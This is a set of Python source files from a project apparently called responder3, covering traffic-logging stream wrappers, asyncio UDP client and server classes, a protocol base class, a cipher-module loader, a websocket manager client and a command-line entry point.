		self.traffic.data_recv[datetime.datetime.utcnow()] = b'<SSL SWITCH>'


class StreamWriterLogging:
	def __init__(self, writer):
		self.writer = writer
		self.traffic = TrafficLog()
	
	@property
	def peer_address(self):
		addr = self.writer.get_extra_info('peername')
		if addr is None:
			addr = ('0.0.0.0',0)
		return addr

	async def log_comms(self):
		return self.traffic

	def write(self, data):
		self.traffic.data_sent[datetime.datetime.utcnow()] = data
		self.writer.write(data)
		
	def write_broadcast(self, data, addr):
		self.traffic.data_sent[datetime.datetime.utcnow()] = b'<BROADCAST>'
		self.writer.write(data, addr)
		self.traffic.data_sent[datetime.datetime.utcnow()] = data

	def writelines(self, data):
		self.traffic.data_sent[datetime.datetime.utcnow()] = data
		self.writer.writelines(data)

	def write_eof(self):
		return self.writer.write_eof()

	def can_write_eof(self):
		return self.writer.can_write_eof()

	def close(self):
		return self.writer.close()

	def is_closing(self):
		return self.writer.is_closing()

	async def wait_closed(self):
		await self.writer.wait_closed

	def get_extra_info(self, name, default=None):
		return self.writer.get_extra_info(name, default)

	async def drain(self):
		await self.writer.drain()

	def pause_reading(self):
		self.writer.transport.pause_reading()

	async def switch_ssl(self, ssl_ctx):
		loop = asyncio.get_event_loop()
		protocol = self.writer.transport.get_protocol()
		new_transport = await loop.start_tls(
			self.writer.transport, 
			protocol, 
			ssl_ctx, 
			server_side=True, 
			ssl_handshake_timeout=None
		)

		self.writer._transport = new_transport
		self.writer._protocol._transport = new_transport
		self.writer._over_ssl = True

		self.traffic.data_sent[datetime.datetime.utcnow()] = b'<SSL SWITCH>'

		return new_transport



import asyncio
import socket
import io
import ipaddress

from responder3.core.sockets import setup_base_socket


def recvfrom(loop, sock, n_bytes, fut=None, registed=False):
	fd = sock.fileno()
	if fut is None:
		fut = loop.create_future()
	if registed:
		loop.remove_reader(fd)

	try:
		data, addr = sock.recvfrom(n_bytes)
	except (BlockingIOError, InterruptedError):
		loop.add_reader(fd, recvfrom, loop, sock, n_bytes, fut, True)
	else:
		fut.set_result((data, addr))
	return fut


def sendto(loop, sock, data, addr, fut=None, registed=False):
	fd = sock.fileno()
	if fut is None:
		fut = loop.create_future()
	if registed:
		loop.remove_writer(fd)
	if not data:
		return

	try:
		n = sock.sendto(data, addr)	
	except (BlockingIOError, InterruptedError):
		loop.add_writer(fd, sendto, loop, sock, data, addr, fut, True)
	else:
		fut.set_result(n)
	return fut


class UDPReader:
	def __init__(self, data, addr):
		"""
		Lightweight wrapper around a UDP socket to provide the same interface as asyncio.StreamReader

		:param data: Data read from the socket
		:type data: bytearray
		:param addr: The socket address of the remote peer
		:type addr: tuple
		"""
		self._ldata = len(data)
		self._remaining = len(data)
		self._addr = addr
		self.buff = io.BytesIO(data)

	@asyncio.coroutine
	def read(self, n = -1):
		if n == -1:
			self._remaining = 0
		else:
			self._remaining -= n
		
		return self.buff.read(n)

	async def readline(self):
		data = self.buff.readline()
		self._remaining -= len(data)
		return data

	async def readuntil(self, separator=b'\n'):
		try:
			#ugly ugly ugly
			pos = self.buff.tell()
			temp = self.buff.read()
			m =  temp.find(separator)
			if m != -1:
				data = temp[:m]
				self.buff.seek(pos + m+1, 0)
				self._remaining -= len(data)
				return data
			
			else:
				self.buff.seek(pos, 0)
				raise Exception('Pattern not found!')
		except Exception as e:
			print(e)
		

	@asyncio.coroutine
	def readexactly(self, n):
		if n == -1:
			self._remaining = 0
		else:
			self._remaining -= n
		return self.buff.read(n)

	def at_eof(self):
		return self._remaining == 0


class UDPWriter:
	def __init__(self, loop, sock, addr, laddr):
		"""
		Lightweight wrapper around a UDP socket to provide the same interface as asyncio.StreamWriter
		:param loop: The main event loop
		:param sock: Socket used to read data from client
		:type sock: socket.socket
		:param addr: Address of the remote peer
		:type addr: tuple
		:param laddr: Address of the local side of the socket
		:type param: tuple
		"""
		self._laddr = laddr
		self._addr = addr
		self._loop = loop
		self._sock = sock

	# TODO: implement close function
	def close(self):
		return

	def get_extra_info(self, info, default=None):
		if info == 'socket':
			return self._sock
		elif info == 'peername':
			return self._addr
		elif info == 'sockname':
			return self._laddr
		else:
			return default

	def get_remote_address(self):
		return self._addr

	def get_local_address(self):
		return self._laddr

	@asyncio.coroutine
	def drain(self):
		return

	"""
	@asyncio.coroutine
	def write(self, data, addr = None):
		if addr is None:
			yield from sendto(self._loop, self._sock, data, self._addr)
		else:
			yield from sendto(self._loop, self._sock, data, addr)
	"""

	def write(self, data, addr = None):
		if addr is None:
			sendto(self._loop, self._sock, data, self._addr)
		else:
			sendto(self._loop, self._sock, data, addr)


class UDPClient:
	def __init__(self, raddr, loop = None, sock = None):
		"""
		Implements a client for asynchronous UDP communications.
		Don't fool yourself this is just a hackish solution to get asyncio streams-like functionality for UDP
		:param raddr: Address to connect to
		:type raddr: tuple
		:param loop: Main event loop
		:param sock: An already set-up socket to wrap
		:type sock: socket.socket
		"""
		self._raddr  = raddr
		self._socket = sock
		self._loop   = loop
		self._laddr  = None
		if loop is None:
			self._loop = asyncio.get_event_loop()

	def start_socket(self):
		family = socket.AF_INET if ipaddress.ip_address(self._raddr[0]).version == 4 else socket.AF_INET6
		self._socket = socket.socket(family, socket.SOCK_DGRAM, 0)
		self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self._socket.setblocking(False)
		self._socket.bind(('', 0))
		self._laddr  = self._socket.getsockname()

	async def run(self, data):
		"""
		Main function.
		:param data: data to send
		:type data: bytearray
		:return: UDPReader, UDPWriter
		"""
		if self._socket is None:
			self.start_socket()
		writer = UDPWriter(self._loop, self._socket, self._raddr, self._laddr)
		writer.write(data)
		data, addr = await recvfrom(self._loop, self._socket, 65536)
		reader = UDPReader(data, addr)
		return reader, writer


# https://www.pythonsheets.com/notes/python-asyncio.html
class UDPServer:
	def __init__(self, callback, listener_socket_config, loop = None, sock = None):
		"""

		:param callback: Function to handle new clients
		:type callback: fnc
		:param server_config: Server configuration
		:type server_config: ServerConfig
		:param loop: Main event loop
		:param sock: Already set-up socket object, if specified it will be used for comms
		:type sock: socket.socket
		"""
		self._callback = callback
		self.listener_socket_config = listener_socket_config
		self._socket = sock
		self._loop   = loop
		if self.listener_socket_config is None:
			if self._socket is None:
				raise Exception('Either socket or server_properties MUST be defined!')
			self._laddr  = self._socket.getsockname()
		else:
			self._laddr  = (str(self.listener_socket_config.bind_addr), self.listener_socket_config.bind_port)
		if loop is None:
			self._loop = asyncio.get_event_loop()

	async def serve_forever(self):
		if self._socket is None:
			self._socket = setup_base_socket(self.listener_socket_config)
		while True:
			data, addr = await recvfrom(self._loop, self._socket, 65536)
			reader = UDPReader(data, addr)
			writer = UDPWriter(self._loop, self._socket, addr, self._laddr)
			await self._callback(reader, writer)

	async def run(self):
		"""
		Main function. Create the reader and writer objects and calls the callback function.
		:return: None
		"""
		return await self.serve_forever()



from abc import ABC, abstractmethod
import asyncio

class ProtocolBase(ABC):
	@staticmethod
	@abstractmethod
	async def from_streamreader(reader):
		"""
		this method needs to be decorated with @asyncio.coroutine
		"""
		raise NotImplementedError

	@staticmethod
	async def from_bytes(bbuff):
		"""
		takes bytes, returns the instentiated class
		"""
		raise NotImplementedError

	@staticmethod
	@abstractmethod
	def from_buffer(buff):
		"""
		takes io.BytesIO, returns the instentiated class
		"""
		raise NotImplementedError

	@abstractmethod
	def construct():
		raise NotImplementedError

	@abstractmethod
	def to_bytes(self):
		"""
		serializes the class
		"""
		raise NotImplementedError



import importlib
import importlib.util

#key = name of the cipher, value=list of module names, in order of preference
preftable = {
	'DES' : ['pyCrypto','pure'], 
	'TDES': ['pyCrypto','pure'], 
	'AES' : ['cryptography','pyCrypto','pure'], 
	'RC4' : ['cryptography','pyCrypto','pure'],

}

available_modules = ['pure']

if importlib.util.find_spec("cryptography") is not None:
	print('Found cryptography package!')
	available_modules.append("cryptography")

elif importlib.util.find_spec("pyCrypto") is not None:
	print('Found cryptography package!')
	available_modules.append("pyCrypto")


#https://stackoverflow.com/questions/8790003/dynamically-import-a-method-in-a-file-from-a-string
def import_from(module, name):
	module = __import__(module, fromlist=[name])
	return getattr(module, name)


def getPreferredCipher(cipherName):
	if cipherName not in preftable:
		raise Exception('Cipher %s doesnt have any preferences set!' % cipherName)
	possible_prefmodule = list(set(preftable[cipherName]).intersection(set(available_modules)))
	selected_module = None
	for moduleName in preftable[cipherName]:
		if moduleName in possible_prefmodule:
			selected_module = moduleName

	if selected_module is None:
		raise Exception('Could not find any modules to load cipher %s' % cipherName)


	print('Preferred module selected for cipher %s is %s' % (cipherName, selected_module))
	moduleName = 'responder3.crypto.%s' % cipherName
	objectName = selected_module + cipherName
	return import_from(moduleName , objectName)

def getSpecificCipher(cipherName, moduleBaseName):
	moduleName = 'responder3.crypto.%s' % cipherName
	objectName = '%s%s' % (moduleBaseName, cipherName)
	return import_from(moduleName , objectName)


#import ciphers
DES  = getPreferredCipher('DES')
AES  = getPreferredCipher('AES')
RC4  = getPreferredCipher('RC4')
#TDES = getPreferredCipher('TDES')



import websockets
import asyncio


from responder3.core.manager.comms import *
from responder3.core.logging.logger import *
from responder3.core.gwss import *
from responder3.core.ssl import SSLContextBuilder

class Responder3ManagerClient:
	def __init__(self, server_url, config, log_queue, manager_log_queue, cmd_q_in, cmd_q_out, shutdown_evt, ssl_ctx = None):
		self.config = config
		self.logger = Logger('Responder3ManagerClient', logQ = log_queue)
		self.manager_log_queue = manager_log_queue #log_queue (asyincio.Queue) that yield all the log messages the responder3 instance has
		self.cmd_q_in = cmd_q_in #commands from the server manager to the clients
		self.cmd_q_out = cmd_q_out #command results from clients to server manager
		self.shutdown_evt = shutdown_evt #asnycio.Event to signal shutdown of the server
		self.shutdown_session_evt = asyncio.Event() #asnycio.Event to signal shutdown of the server
		
		self.server_url = server_url
		self.ssl_ctx = ssl_ctx
		if self.ssl_ctx:
			self.ssl_ctx = SSLContextBuilder.from_dict(ssl_ctx)
		
		self.classloader = R3ClientCommsClassLoader()
		self.ws = None
		
	@r3exception
	async def handle_logs(self):
		"""
		Waits for logs coming form the log queue, wraps them in R3CliLog object and sends them to the manager
		"""
		while not self.shutdown_session_evt.is_set():
			log_obj = await self.manager_log_queue.get()
			log_obj_type = logobj2type_inv[type(log_obj)]
			await self.send_msg(R3CliLog(log_obj_type = log_obj_type, log_obj = log_obj))
			
	@r3exception
	async def handle_incoming_commands(self):
		while not self.shutdown_session_evt.is_set():
			try:
				cmd_data = await self.ws.recv()
			except Exception as e:
				self.shutdown_session_evt.set()
				raise e
			
			print('Command in! %s' % cmd_data)
			cmd = self.classloader.from_json(cmd_data)
			print(cmd)
			await self.cmd_q_in.put(cmd)
	
	@r3exception 
	async def handle_outgoing_replies(self):
		while not self.shutdown_session_evt.is_set():
			rply = await self.cmd_q_out.get()
			print(rply)
			await self.send_msg(rply)
		
	@r3exception
	async def send_msg(self, msg):
		msg.remote_ip = 'test'
		msg.remote_port = 0
		try:
			await self.ws.send(msg.to_json())
		except Exception as e:
			self.shutdown_session_evt.set()
			raise e
			
			
	@r3exception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				self.shutdown_session_evt.clear()
				await self.logger.info('Connecting to manager server...')
				async with websockets.connect(self.server_url, ssl = self.ssl_ctx) as ws:
					self.ws = ws
					await self.logger.info('Connected to manager server!')
					asyncio.ensure_future(self.handle_logs())
					asyncio.ensure_future(self.handle_incoming_commands())
					asyncio.ensure_future(self.handle_outgoing_replies())
					await self.shutdown_session_evt.wait()
					await asyncio.sleep(1)
			except Exception as e:
				await self.logger.exception()
				pass
			
			await asyncio.sleep(5)
			
		
if __name__ == '__main__':
	config = {}
	logger = Logger('Responder3ManagerServer')
	manager_log_queue = asyncio.Queue()
	cmd_q_in = asyncio.Queue()
	cmd_q_out = asyncio.Queue()
	shutdown_evt = asyncio.Event()
	server_url = 'ws://127.0.0.1:9191'
	
	r3c = Responder3ManagerClient(server_url, config, logger, manager_log_queue, cmd_q_in, cmd_q_out, shutdown_evt)
	
	loop = asyncio.get_event_loop()
	asyncio.ensure_future(logger.run())
	loop.run_until_complete(r3c.run())
	


#!/usr/bin/python3
import sys
import asyncio
from responder3.core.responder3 import Responder3


def main():
	loop = asyncio.get_event_loop()	
	
	parser = Responder3.get_argparser()
	if len(sys.argv) < 2:
		parser.print_usage()
		return

	responder3 = Responder3.from_args(parser.parse_args())
	#returns None if there is nothing to run (like listing interfaces)
	
	if responder3:
		loop.run_until_complete(responder3.run())
		print('Responder finished!')

if __name__ == '__main__':
	main()
